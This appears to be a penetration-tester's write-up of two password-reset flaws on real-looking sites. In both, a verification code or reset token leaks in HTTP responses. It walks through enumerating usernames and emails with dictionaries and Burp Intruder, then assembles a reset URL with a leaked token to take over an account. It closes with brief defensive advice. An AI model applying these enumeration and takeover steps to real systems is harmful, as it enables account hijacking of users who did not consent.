Among logic vulnerabilities, arbitrary user password reset is the most common, which may appear on the new user registration page, or the page for resetting the password after the user logs in, or the password recovery page when the user forgets the password. Among them, the password retrieval function is the hardest hit by the vulnerability. I analyzed the causes of the vulnerabilities in the cases encountered in the daily penetration process. This time, I will focus on any user password reset problems caused by the leakage of reset credentials.
Case number one
When retrieving the password by email, the verification code as the reset credential is sent to the client in the HTTP response, and it can be easily obtained after capturing the packet. First use the attacker account to go through the process of password retrieval. The test account is firstname.lastname@example.org, and the email address is used to retrieve the password:
Click to get the check code and grab the following response:
Among them, VFCode is likely to be a check code. Log in to the mailbox to check the password retrieval email sent from the website:
It is found that the two are the same, then it can almost be confirmed that the server leaked the verification code of the password retrieval to the client, which may cause any account password reset problem.
Try to retrieve the password of the normal account. After entering the mailbox on the password retrieval page, the system will immediately verify whether the mailbox is registered:
Define the UName parameter as an enumerated variable, and use common qq mailboxes as a dictionary to enumerate multiple valid mailboxes:
Take email@example.com as an example, find the check code in the response packet, successfully reset its password to PenTest1024, and verify whether you can log in:
Try to retrieve the password of the administrator account. From the domain name registration information of this website, the email address of the contact person is found to be firstname.lastname@example.org. It can be inferred that the email suffix of the back-end user is @xxxx.cn. Therefore, simple adjustment of common back-end user names can construct a back-end user mailbox dictionary. Then enumerate a large number of background users:
In the same way, the account passwords of these background users can be reset. In order to avoid affecting the business, no actual operation is performed.
When retrieving the password by email, the reset link with the credentials leaked to the client, which can be obtained by capture. Use the attacker’s account to go through the process of password retrieval once. Enter the attacker’s account and email (yangyangwithgnu, email@example.com) on the password recovery page and submit:
Intercept the following responses:
Obviously it is a redirection. The two parameters of isVerify and PassPhrase are suspicious and should be paid attention to in subsequent interactions. Let the data packet pass first, enter the page to send the reset email, enter the verification code and submit. Log in to the attacker’s mailbox to view the reset email:
The following content is visible to members
[wc_pay_can_read id=’2026,2029,2030′ tishi=’You do not have permission to read this content, click here to become a member and refresh this page to read it’]
This reset link with token is very familiar. Yes, it is the token information obtained from the previous packet capture. Compare:
The only difference is the two file names forgotPwdEa and forgotPwdEc.
Next, verify that the token leaked through the server can reset the account password of the ordinary user. As can be seen from the reset process, to reset the password, you must provide your username and its email (or mobile phone number).
Get a valid user name. In the registration page, after entering the user name, immediately verify whether the user name is occupied:
The corresponding request and response are as follows:
If the user name already exists, it returns failed, if it does not exist, it returns ok. With this feature, with a common name dictionary, a large number of valid user names (such as chenchuan, chenanqi, chenanxiu, zhangfeng, etc.) can be enumerated and saved as username.txt.
Get the mailbox corresponding to the valid user name. In the request submitted by the password retrieval page, if the user_name matches the email parameter, the HTTP response code is 302, and the interactive package is as follows:
This feature can enumerate valid user names and their mailboxes. Now consider how to make a mailbox dictionary. Many users like to register qq email with their username. In other words, the username yangyangwithgnu may correspond to the email firstname.lastname@example.org. Therefore, the mailbox dictionary qq-email.txt is quickly created by using the valid username dictionary username.txt that has been obtained earlier, in which username.txt corresponds to qq-email.txt line by line.
For example, the former acts as yangyangwithgnu first, and the latter acts as email@example.com. Put the above data packet into burp’s intrduer, and select pitchfork as the attack type. The parameter value of user_name is defined as enumerated variable 1 and the dictionary username.txt is loaded, and the parameter value of email is defined as enumerated variable 2 and the dictionary qq-email.txt is loaded, which can enumerate a large number of valid user name/mailbox information, such as, firstname.lastname@example.org, email@example.com, etc.
Use ordinary account firstname.lastname@example.org to demonstrate the password reset vulnerability. Enter the username and password to submit, complete the password retrieval logic normally, and obtain the reset token issued by the server from the interactive package:
Assemble the reset link http://www.xxxx.com/user/forgotPwdEc.php?isVerify=Y2hlbmNodWFufGNoZW5jaHVhbkBxcS5jb218MTE2MDIzNw==&PassPhrase=cbf0160662358808f3586868f041cbaa, you can enter the link to reset the password:
After entering the new password PenTest1024, the system prompts that the modification is successful. Log in successfully with chenchuan/PenTest1024:
In terms of defensive measures, the credentials for password retrieval must not be issued to the client. In addition, a picture verification code should be added when verifying whether the mailbox is valid to prevent key parameters from being enumerated.